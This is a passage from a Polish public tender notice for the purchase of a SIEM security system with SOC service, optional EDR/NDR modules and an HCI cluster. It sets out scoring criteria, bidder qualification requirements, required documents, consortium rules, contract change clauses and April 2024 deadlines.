Dodatkowe świadczenia - to dodatkowe moduły oferowane wraz z przedmiotem zamówienia, wskazane w formularzu oferty wraz ze wsparciem. Wykonawca może (nie ma obowiązku) zaoferować przedmiot zamówienia ze wskazanymi przez Zmawiającego dodatkowymi modułami uzyskując dodatkowe punkty. Przy czym ilość tych dodatkowych punktów jest również związana z zaoferowaną długością wsparcia do Datkowego wyposażenia. Wykonawcy w tym kryterium zostaną ocenieni w następujący sposób:<br/>a) zamówienie podstawowe bez elementów dodatkowych opisanych niżej - 0,00 pkt x Waga (20%) = ocena 0,00 pkt, b) dostarczenie systemu SIEM z dodatkowym modułem EDR (Endpoint Detection and Response) ze wsparciem na co najmniej 12 m-cy - 25,00 pkt x Waga (20%) = ocena 5,00 pkt <br/>LUB<br/>dostarczenie systemu SIEM z dodatkowym modułem EDR (Endpoint Detection and Response) ze wsparciem na co najmniej 24 m-ce - 50,00 pkt x Waga (20%) = ocena 10,00 pkt.<br/>c) dostarczenie systemu SIEM z dodatkowym modułem NDR (Network Detection and Response) ze wsparciem na co najmniej 12 m-cy - 25,00 pkt x Waga (20%) = ocena 5,00 pkt<br/>LUB<br/>dostarczenie systemu SIEM z dodatkowym modułem NDR (Network Detection and Response) ze wsparciem na co najmniej 24 m-ce - 50,00 pkt x Waga (20%) = ocena 10,00 pkt.<br/>ŁĄCZNA OCENA W TYM KRYTERIUM TO SUMA PUNKTÓW UZYSKANYCH W lit. a) – c)<br/>Pełen opis w rozdz. XXIII SWZ.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja oraz wsparcie techniczne (system SIEM)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Długość SOC (Security Operations Center)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">Kryterium 4</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Dodatkowe świadczenia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Warunki udziału w postępowaniu ustanowione przez Zamawiającego:<br/>1) Zdolności do występowania w obrocie gospodarczym: ZAMAWIAJĄCY NIE STAWIA SZCZEGÓŁOWEGO WARUNKU W TYM ZAKRESIE,<br/>2) Uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów: ZAMAWIAJĄCY NIE STAWIA SZCZEGÓŁOWEGO WARUNKU W TYM ZAKRESIE,<br/>3) Sytuacja ekonomiczna lub finansowa: ZAMAWIAJĄCY ŻĄDA BY WYKONAWCA był ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia z sumą gwarancyjną tego ubezpieczenia 800.000,00 zł<br/>4) Zdolność techniczna lub zawodowa:<br/>a) posiadanie niezbędnej wiedzy i doświadczenia, tj.: ZAMAWIAJĄCY ŻĄDA BY WYKONAWCA nie wcześniej niż w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonał co najmniej:<br/>	1 dostawę i wdrożenie systemu klasy SIEM wraz z usługą SOC o wartości nie niższej niż 200.000,00 zł brutto,<br/>oraz<br/>	2 dostawy systemów z zakresu cyberbezpieczeństwa na kwotę min. 500.000 brutto każda;<br/>oraz<br/>	1 dostawę i wdrożenie oferowanego klastra HCI dla min. 3 serwerów<br/>UWAGA:<br/>1. W przypadku, gdy zamówienia o wyżej opisanym zakresie były zrealizowane łącznie z innymi zakresami dostaw, Wykonawca musi bezwzględnie wykazać przedmiot, wielkość i zakres tylko tych dostaw, które jako zadanie wymienione wyżej potwierdzają spełnienie warunków udziału w niniejszym postępowaniu.<br/>2. Zamawiający dopuszcza, aby Wykonawca w celu spełniania warunku udziału w postępowaniu wykazał się zamówieniem lub zamówieniami, spełniającymi łącznie warunki wskazane wyżej (np. jedna umowa obejmująca komponenty opisane w lit. a) itp.).<br/>3. Zamawiający w celu udokumentowania spełnienia warunku doświadczenia nie dopuszcza sumowania wartości zadań (opisanych w lit. a) odpowiednio dla tiret i lub/i tiret ii) z różnych okresów, różnych dostaw tego samego lub różnych Zamawiających.<br/>b) dysponowanie osobami zdolnymi do wykonania zamówienia tj. ZAMAWIAJĄCY ŻĄDA BY WYKONAWCA: zatrudniał:<br/>	min. 1 kierownika/koordynatora zespołu posiadającym doświadczenie w prowadzeniu projektów informatycznych na stanowisku kierownika wdrożenia, potwierdzone udziałem w roli kierownika projektu w co najmniej 2 zakończonych projektach informatycznych o wartości co najmniej 300 000 zł brutto (słownie: trzysta tysięcy złotych) każde, w tym co najmniej jednym projekcie, <br/>w którego zakresie była dostawa i wdrożenie systemu klasy SIEM oraz świadczenia usługi SOC;<br/>	min. 2 osoby posiadające ważny certyfikat techniczny potwierdzający kompetencje z zakresu wdrażania i konfigurowania systemów klasy UTM;<br/>	min. 2 osoby posiadające wiedzę i doświadczenie z zakresu wdrażania i konfigurowania oferowanego systemu SIEM. Minimum jedna osoba posiadająca ważny certyfikat inżynierski wystawiony przez producenta oferowanego systemu SIEM;<br/>UWAGA:<br/>1. Zamawiający dopuszcza możliwość łączenia ról z wyłączeniem kierownika/koordynatora zespołu. Zamawiający dopuszcza, że jedna osoba może posiadać więcej niż jeden z powyższych certyfikatów, do wykonania zamówienia. <br/>2. Wszystkie osoby, o których mowa powyżej, powinny biegle posługiwać się językiem polskim (w mowie i piśmie), w przeciwnym wypadku Wykonawca musi zapewnić tłumacza zapewniającego stałe tłumaczenie dla potrzeb realizacji zamówienia. <br/>c) spełnienie norm zarządzania jakością tj. ZAMAWIAJĄCY ŻĄDA BY WYKONAWCA posiadał:<br/>	wdrożony system bezpieczeństwa informacji zgodnie z normą ISO 27001 potwierdzony certyfikatem wydanym przez akredytowaną jednostkę certyfikującą.<br/>3. Warunek udziału w postępowaniu dotyczący odpowiednio wykształcenia, kwalifikacji zawodowych lub doświadczenia musi być spełniony:<br/>1)	przez Wykonawcę samodzielnie<br/>a w przypadku podmiotów występujących wspólnie, samodzielnie przez minimum jednego z Wykonawców wy-stępujących wspólnie. Celem potwierdzenia Wykonawcy składający ofertę wspólnie są zobowiązani do oferty dołączyć oświadczenie na podstawie art. 117 ust. 4 Pzp – zał. nr 3 do SWZ;<br/>lub<br/>2)	przez podmiot udostępniający zasoby.<br/>UWAGA: <br/>W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia w zakresie warunków kwalifikacji technicznych, warunki musi spełniać w całości co najmniej jeden z Wykonawców lub podmiot trzeci, na zasoby którego powołują się Wykonawcy.<br/>4. Wykonawca polegając na zdolnościach technicznych lub zawodowych podmiotów, o których mowa w ust. 3 pkt 2 musi dostarczyć Zamawiającemu dowód dysponowania tymi zasobami w trakcie realizacji za¬mówienia, a w szczególności dokumentów, które określają:<br/>1)	zakres dostępnych Wykonawcy zasobów innego podmiotu;<br/>2)	sposób i okres udostępniania Wykonawcy i wykorzystania przez niego zasobów innego podmiotu, przez Wykonawcę, przy wykonywaniu zamówienia publicz¬nego.<br/>W przypadku udostępniania wykonawcy „ubezpieczenia” – podmiot będzie zobowiązany przedłożyć odpowiednio: polisę lub inny dowód posiadanego ubezpieczenia OC wraz z dowodem opłacenia składki/składek.<br/>5. W myśl art. 123 Pzp po upływie terminu składania ofert Wykonawca nie może powoływać się na zdolności podmiotów udostępniających zasoby, jeżeli na etapie składania oferty w FORMULARZU OFERTY nie wskazał, że polega on na zdolnościach lub sytuacji konkretnych podmiotów udostępniających zasoby lub nie dowiedzie, że w tym czasie polegał w danym zakresie na zdolnościach lub sytuacji podmiotów udostępniających zasoby. <br/>Numeracja ustępów zgodna z SWZ, pełny tekst w rozdz. XIX SWZ. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">NIE DOTYCZY</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">2. Wykonawca, którego oferta zostanie najwyżej oceniona, na wezwanie Zamawiającego w wyznaczonym nie krótszym niż 5 dni terminie składa aktualne na dzień składania następujące oświadczenia i dokumenty potwierdzające w celu potwierdzenia, że Wykonawca spełnia warunki udziału w postępowaniu (art. 273 ust. 1 pkt 2):<br/> a) Zdolności do występowania w obrocie gospodarczym: NIE DOTYCZY;<br/>b) Uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów: NIE DOTYCZY;<br/> c) Sytuacja ekonomiczna lub finansowa: <br/>- dokumenty potwierdzające, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia ze wskazaniem sumy gwarancyjnej tego ubezpieczenia (wraz z dowodem, że składki za polisę OC zostały opłacone...)<br/>d) Zdolność techniczna lub zawodowa:<br/>- wykazu dostaw wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane lub są wykonywane, oraz załączeniem dowodów określających czy te dostawy lub usługi zostały wykonane lub są wykonywane należycie; w/g zał. nr 5 do SWZ.<br/>Dowodami, o których mowa w zdaniu poprzednim są:<br/>1) referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego dostawy lub usługi zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, <br/>2) jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - oświadczenie wykonawcy; <br/>- w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy;<br/>3) jeżeli Wykonawca powołuje się na doświadczenie w realizacji dostaw, wykonywanych wspólnie z innymi Wykonawcami, wykaz, o którym mowa wyżej ma dotyczyć dostaw, w których wykonaniu Wykonawca ten bezpośrednio uczestniczył.<br/>UWAGA: W przypadku, gdy Zamawiający jest podmiotem, na rzecz którego dostawy, wskazane w wykazie zostały wcześniej wykonane lub jeśli Zamawiający posiada podmiotowe środki dowodowe to Wykonawca nie ma obowiązku przedkładania dowodów - jeżeli wykonawca wskaże te środki oraz potwierdzi ich prawidłowość i aktualność....<br/>- wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za kontrolę jakości, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami; w/g zał. nr 6 do SWZ;<br/>- zaświadczenia niezależnego podmiotu zajmującego się poświadczaniem spełniania przez wykonawcę określonych norm zarządzania jakością - zamawiający odwołuje się do systemów zarządzania jakością opartych na odpowiednich seriach norm europejskich oraz certyfikowanych przez akredytowane jednostki.<br/>3. Zamawiający oceni, czy udostępniane Wykonawcy przez podmioty udostępniające zasoby zdolności zawodowe pozwalają na wykazanie przez Wykonawcę spełniania warunków udziału w postępowaniu, o których mowa w art. 112 ust. 2 Pzp a zostały opisane w rozdz. XIX SWZ oraz zbada, czy nie zachodzą, wobec tego podmiotu podstawy wykluczenia, o których mowa w art. 108 ust. 1 Pzp.<br/>4. W związku z sytuacją, o której mowa w ust. 3 Zamawiający żądać będzie od Wykonawcy polegającego na zdolnościach lub sytuacji innych podmiotów na zasadach określonych w art. 118 Pzp przedstawienia w odniesieniu do tych pomiotów oświadczeń i dokumentów, o których mowa w rozdz. XXI ust. 1.<br/>5. Jeżeli zdolności zawodowe podmiotu udostępniającego zasoby nie potwierdzają spełniania przez Wykonawcę warunków udziału w postępowaniu lub...<br/>Numeracja zgodna z SWZ, pełny tekst w rozdz. XXI SWZ.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> 1. Zmawiający żąda dołączenia do oferty katalogów (kat katalogowych), wydruków ze stron internetowych producentów oferowanego asortymentu lub innych źródeł (np. zestawienie opisanych adresów stron internetowych producentów, zawierających informacje o oferowanym wyposażeniu, sprzętach, oprogramowaniu itp.) - zawierających zapisy dotyczące parametrów, wymagań parametrów jakościowych, technicznych i technologicznych oraz innych ustalonych w zał. nr 8 do SWZ – opis przedmiotu zamówienia potwierdzające spełnienie wymagań określonych przez Zamawiającego.<br/>2. Przedmiotowe środki dowodowe sporządza się w postaci elektronicznej, w formatach danych określonych w przepisach wydanych na podstawie art. 18 ustawy z dnia 17 lutego 2005r. o informatyzacji działalności podmiotów realizujących zadania publiczne z zastrzeżeniem formatów, o których mowa w art. 66 ust. 1 ustawy Pzp, z uwzględnieniem rodzaju przekazywanych danych.<br/>3. Przedmiotowe środki dowodowe sporządzone w języku obcym przekazuje się wraz z tłumaczeniem na język polski.<br/>4. W przypadku, gdy przedmiotowe środki dowodowe zostały wystawione przez upoważnione podmioty inne niż wykonawca, wykonawca wspólnie ubiegający się o udzielenie zamówienia lub podmiot udostępniający zasoby, zwane dalej &#34;upoważnionymi podmiotami&#34;:<br/>a) jako dokument elektroniczny - przekazuje się ten dokument;<br/>b) jako dokument w postaci papierowej, przekazuje się cyfrowe odwzorowanie tego dokumentu opatrzone kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym, poświadczające zgodność cyfrowego odwzorowania z dokumentem w postaci papierowej;<br/>- poświadczenia zgodności cyfrowego odwzorowania z dokumentem w postaci papierowej, o którym mowa wyżej, dokonuje odpowiednio wykonawca lub wykonawca wspólnie ubiegający się o udzielenie zamówienia.<br/>5. Przez cyfrowe odwzorowanie, o którym mowa w ust. 4 lit b) należy rozumieć dokument elektroniczny będący kopią elektroniczną treści zapisanej w postaci papierowej, umożliwiający zapoznanie się z tą treścią i jej zrozumienie, bez konieczności bezpośredniego dostępu do oryginału.<br/>6. Przedmiotowe środki dowodowe niewystawione przez upoważnione podmioty przekazuje się:<br/>a) w postaci elektronicznej i opatruje się kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym wykonawcy lub wykonawcy wspólnie ubiegającego się o udzielenie zamówienia;<br/>b) gdy zostały sporządzone jako dokument w postaci papierowej i opatrzone własnoręcznym podpisem, przekazuje się cyfrowe odwzorowanie tego dokumentu opatrzone kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym, poświadczającym zgodność cyfrowego odwzorowania z dokumentem w postaci papierowej;<br/>- poświadczenia zgodności cyfrowego odwzorowania z dokumentem w postaci papierowej, o którym mowa wyżej dokonuje odpowiednio wykonawca lub wykonawca wspólnie ubiegający się o udzielenie zamówienia.<br/>7. Wymienione w ust. 1 środki podlegają uzupełnieniu na zasadach określonych w rozdz. XXI ust. 7 pkt 5 SWZ. <br/>8. W przypadku konieczności uzyskania dodatkowych informacji lub wyjaśnienia wątpliwości, zastrzeżeń Zamawiającemu służy prawo do żądania wyjaśnień, w tym przedstawienia kopii decyzji PIS o zatwierdzeniu zakładu, w trybie art. 223 ust. 1 Pzp.<br/>Informacja z rozdz. XX SWZ. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> Wszystkie, o których mowa w rozdz. XX SWZ na zasadach opisanych w ust. 7 tego rozdziału. <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> KOMPLETNA OFERTA POWINNA ZAWIERAĆ:<br/>1) formularz oferty wg zał. nr 1 do SWZ; <br/>2) oświadczenie z art. 125 ust. 1 Wykonawców o niepodleganiu wykluczeniu z postępowania oraz o spełnianiu warunków udziału - wg zał. nr 2 do SWZ;<br/>3) oświadczenie producenta tj. firmy Nefeni Sp. z o.o. potwierdzające, że migracja SEOD będzie przeprowadzona przez producenta lub pod jego nadzorem merytorycznym - zgodnie z zapisem OPZ;<br/>4) przedmiotowe środki dowodowe – wg zasad opisanych w rozdz. XX SWZ<br/>5) oświadczenie z art. 117 ust. 4 Wykonawców wspólnie ubiegających się o zamówienie - wg zał. nr 3 do SWZ (jeśli dotyczy);<br/>6) zobowiązanie podmiotu udostępniającego zasoby Wykonawcy do dyspozycji na potrzeby realizacji zamówienia wraz z oświadczeniem z art. 125 ust. 5 - wg zał. nr 4 do SWZ (jeśli dotyczy);<br/>7) pełnomocnictwa dla osób podpisujących wszystkie dokumenty ofertowe, o ile prawo składania oświadczeń woli w imieniu Wykonawcy nie wynika z dokumentów rejestrowych - ust. 15 (jeżeli występuje); <br/>8) pełnomocnictwo do reprezentowania Wykonawców wspólnie ubiegających się o zamówienie – wg zasad opisanych w ust. 16 (jeżeli występuje);<br/>9) pełnomocnictwo do reprezentowania Podmiotu udostępniającego zasoby - ust. 16 (jeżeli występuje);<br/>10) dowody równoważności - zgodnie z zapisem OPZ (jeżeli dotyczy). <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 18. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia: <br/>1)	Wykonawcy ustanawiają pełnomocnika co najmniej do reprezentowania ich w postępowaniu;<br/>2)	treść pełnomocnictwa Wykonawców wspólnie ubiegających się o zamówienie winna: <br/>a) identyfikować wszystkich Wykonawców; <br/>b) wskazywać jakiego postępowania dotyczy; <br/>c) wskazywać ustanowionego pełnomocnika;<br/>d) określać zakres umocowania pełnomocnika; <br/>e) zwierać oświadczenie o przyjęciu wspólnej solidarnej odpowiedzialności za wykonanie lub nienależyte wykonanie zamówienia;<br/>f) być podpisana przez osoby upoważnione do reprezentowania poszczególnych Wykonawców i w formie oryginału lub w kopii poświadczonej notarialnie musi znajdować się w ofercie wspólnej Wykonawców; pełnomocnictwo może być udzielone w szczególności: łącznie przez wszystkich Wykonawców (jeden dokument) albo oddzielnie przez każdego z nich (tyle dokumentów ilu Wykonawców);<br/>3)	jeśli pełnomocnik Wykonawców udzieli „dalszego pełnomocnictwa”, upoważnienie do wykonania takiej czynności powinno jasno wynikać z pełnomocnictwa Wykonawców wspólnie ubiegających się o udzielenie zamówienia; <br/>4)	Wykonawcy solidarnie odpowiadają za podpisanie umowy, wykonanie umowy;<br/>5)	w ofercie powinien być podany adres do korespondencji i kontakt telefoniczny z pełnomocnikiem; korespondencja dokonywana będzie wyłącznie z podmiotem występującym jako Pełnomocnik; <br/>6)	poświadczenie dokumentów odbywa się zgodnie z zapisami niniejszej SWZ oraz rozporządzenia w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie;<br/>7)	oferta wspólna składana przez dwóch lub więcej Wykonawców winna spełniać niżej wymienione wymagania:<br/>a) formularz oferty i dokumenty podmiotowe składa wyłoniony LIDER (pełnomocnik);<br/>b) dokumenty, dotyczące własnej firmy, takie jak np.: oświadczenie o braku podstaw do wykluczenia i o spełnianiu warunków udziału w postępowaniu składa każdy z Wykonawców składających ofertę wspólną we własnym imieniu (powyższe dotyczy również wspólników spółki cywilnej);<br/>c) kopie dokumentów dotyczących każdego z Wykonawców składających ofertę wspólną muszą być poświadczone za zgodność z oryginałem przez osobę lub osoby upoważnione do reprezentowania tych Wykonawców;<br/>8)	załączone do oferty dokumenty powinny potwierdzać, że osoby podpisujące pełnomocnictwo są uprawnione do składania oświadczeń woli w imieniu Wykonawcy; <br/>9)	jeżeli oferta Wykonawców wspólnie ubiegających się o uzyskanie zamówienia zostanie wybrana, Wykonawcy składający ofertę wspólną (zwani dalej konsorcjum) będą mieli obowiązek przedstawić Zamawiającemu umowę regulującą współpracę, która powinna zawierać:<br/>a) określenie członków konsorcjum;<br/>b) wskazanie celu gospodarczego ustanowienia konsorcjum, w sposób precyzyjny wskazać nazwę inwestycji, jej lokalizację, określenie inwestora (zamawiającego); <br/>c) określenie udziału stron umowy w realizacji przedmiotu zamówienia;<br/>d) szczegółowy podział prac, który jasno określi punkty styku między konsorcjantami podczas realizacji przedmiotu zamówienia;<br/>e) określenie lidera Konsorcjum, jego praw i obowiązków;<br/>f) postanowienia dotyczące wygaśnięcia umowy konsorcjum, określenie czasu obowiązywania umowy, który nie może być krótszy, niż okres obejmujący realizację zamówienia oraz czas trwania gwarancji jakości. Konsorcjum winno być powołane najpóźniej w dniu upływu terminu składania ofert;<br/>10) wypełniając formularz oferty jak również inne dokumenty powołujące się na Wykonawcę; w miejscu „np. nazwa i adres Wykonawcy” należy wpisać dane Wykonawców wspólnie ubiegających się o zamówienie;<br/>11) wspólnicy spółki cywilnej są traktowani jak Wykonawcy składający ofertę wspólną i mają do nich zastosowanie zasady określone w niniejszym ustępie (w szczególności każdego prowadzącego działalność wpisujemy w formularzu oferty osobno...<br/>Numeracja zgodna z SWZ. Pełny tekst w rozdz. XIV SWZ. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 8.	Zamawiający przewiduje możliwość zmiany: <br/>1)	terminu wykonania zamówienia w przypadku: <br/>a)	wstrzymania dokonania dostawy przez Zamawiającego, o czas wstrzymania;<br/>b)	zmiany terminu realizacji Umowy w przypadku wystąpienia przestojów i opóźnień zawinionych przez Zamawiającego;<br/>c)	zmiany terminu na skutek działań osób trzecich lub organów władzy publicznej, które spowodują konieczność przerwania lub czasowe zawieszenie realizacji zamówienia;<br/>d)	w sytuacji, gdy Zamawiający nie będzie w stanie odebrać Przedmiotu umowy, np. ze względu na okoliczności organizacyjne, o czas trwania tych okoliczności;<br/>e)	jeżeli dochowanie terminu przewidzianego w Umowie stało się niemożliwe z przyczyn niezależnych od Wykonawcy;<br/>f)	wystąpienia warunków siły wyższej, które uniemożliwiły wykonanie Umowy w dotychczas ustalonym terminie. Siła wyższa rozumiana jest jako wydarzenie lub okoliczność o charakterze nadzwyczajnym, na którą Wykonawca ani Zamawiający nie mają wpływu. Siła wyższa obejmuje w szczególności następujące zdarzenia: wojna, działania wojenne, działania wrogów zewnętrznych, terroryzm, rewolucja, przewrót wojskowy lub cywilny, wojna domowa, skutki zastosowania amunicji wojskowej, materiałów wybuchowych, skażenie radioaktywne, z wyjątkiem tych które mogą być spowodowane użyciem ich przez Wykonawcę, klęski żywiołowe, bunty, niepokoje, strajki, okupacje budowy przez osoby inne niż pracownicy Wykonawcy i jego Podwykonawców; <br/>g)	konieczność zrealizowania Przedmiotu umowy przy zastosowaniu innych rozwiązań technicznych lub materiałowych ze względu na zmiany obowiązującego prawa;<br/>h)	wystąpienia zmian powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację Przedmiotu umowy;<br/>2)	sposobu wykonania Przedmiotu Umowy, zmianę wynagrodzenia Wykonawcy, zmiany zakresu Przedmiotu umowy w przypadku: <br/>a)	konieczności uwzględnienia okoliczności, których nie można było przewidzieć w chwili zawarcia Umowy o udzielenie zamówienia publicznego;<br/>b)	gdy ze względu na interes Zamawiającego zmiana warunków i terminu płatności oraz sposobu rozliczeń, o których mowa w § 4 Umowy jest konieczna, w szczególności wynika z wszelkich zmian zasad dofinansowania projektu w ramach uzyskanego dofinasowania oraz zmiany terminów płatności wynikające z wszelkich uzasadnionych (koniecznych) zmian wprowadzanych do Umowy; <br/>c)	wystąpienia zmian powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację Przedmiotu umowy;<br/>d)	zmiana zasad dokonywania odbioru dostaw lub poszczególnych jej elementów, jeśli nie spowoduje to zwiększenia kosztów dokonywania odbiorów, które obciążałyby Zamawiającego;<br/>e)	siła wyższa uniemożliwiająca wykonanie Przedmiotu umowy zgodnie z Umową. Siła wyższa rozumiana jest jako wydarzenie lub okoliczność o charakterze nadzwyczajnym, na którą Wykonawca ani Zamawiający nie mają wpływu. Siła wyższa obejmuje w szczególności następujące zdarzenia: wojna, działania wojenne, działania wrogów zewnętrznych, terroryzm, rewolucja, przewrót wojskowy lub cywilny, wojna domowa, skutki zastosowania amunicji wojskowej, materiałów wybuchowych, skażenie radioaktywne, z wyjątkiem tych które mogą być spowodowane użyciem ich przez Wykonawcę, klęski żywiołowe, bunty, niepokoje, strajki, okupacje budowy przez osoby inne niż pracownicy Wykonawcy i jego Podwykonawców;<br/>f)	utrzymania stanu zagrożenia epidemiologicznego, o którym mowa w ustawie z dnia 5 grudnia 2008 r. o zapobieganiu oraz zwalczaniu zakażeń i chorób zakaźnych u ludzi, jego zaostrzenia lub wprowadzenia przez uprawnione organy państwowe innego stanu nadzwyczajnego, który ma na celu podjęcie określonych działań przeciwepidemicznych i zapobiegawczych dla zminimalizowania skutków epidemii, który znacząco uniemożliwia lub utrudnia realizację przedmiotu zamówienia. <br/>9.	Wynagrodzenie Wykonawcy może ulec zmianie w przypadku ustawowej zmiany stawki VAT oraz podatku akcyzowego. <br/>10. W przedstawionych w ust. 8... <br/>Numeracja zgodna z projektem umowy. Pełny tekst w § 10 zał . nr 7 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-04-24 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę wraz z wymaganymi dokumentami należy umieścić na platformie zakupowej pod adresem: https://platformazakupowa.pl/transakcja/898284</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-04-24 09:10</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-05-21</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> W myśl art. 7 ust. 1 ustawy o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego obejmuje się sankcjami:<br/>1) wykonawcę wymienionego w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisanego na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3;<br/>2) wykonawcę, którego beneficjentem rzeczywistym w rozumieniu ustawy o przeciwdziałaniu praniu pieniędzy oraz finansowaniu terroryzmu jest osoba wymieniona w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisana na listę lub będąca takim beneficjentem rzeczywistym od dnia 24 lutego 2022r., o ile została wpisana na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3;<br/>3) wykonawcę, którego jednostką dominującą w rozumieniu art. 3 ust. 1 pkt 37 ustawy o rachunkowości 